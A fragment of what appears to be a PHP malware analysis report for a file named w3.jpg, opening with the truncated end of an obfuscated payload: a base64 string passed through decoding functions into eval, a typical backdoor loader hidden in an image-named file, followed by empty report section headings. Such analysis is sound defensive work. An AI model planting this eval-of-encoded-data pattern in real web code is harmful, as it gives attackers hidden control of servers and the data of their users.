uMKRYmMMR7Lw8bd1xyojKA9hAD6NQjjP/97Nr2521bKM9EXvzslt6JLMNevX9+nIK6jtcmwOryEM14bpHG//I7/mXO4MGwgGwDWwBaht3fbOt3v3bKbyPIIQBk53nxu02lVSsEZTiqEKlu62S10Or5oJdiI/2lcHJOi90rmUdHWAffaP/Du82u9d71X7ciHu1fkCBwJe4q+RVEAulfkGBgL4H9RA";
eval(htmlspecialchars_decode(urldecode(base64_decode($gz))));
exit;
?>
PHP Malware Analysis

w3.jpg

md5: 2f32654d6bb2224d6e60ea6f48ef7551

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
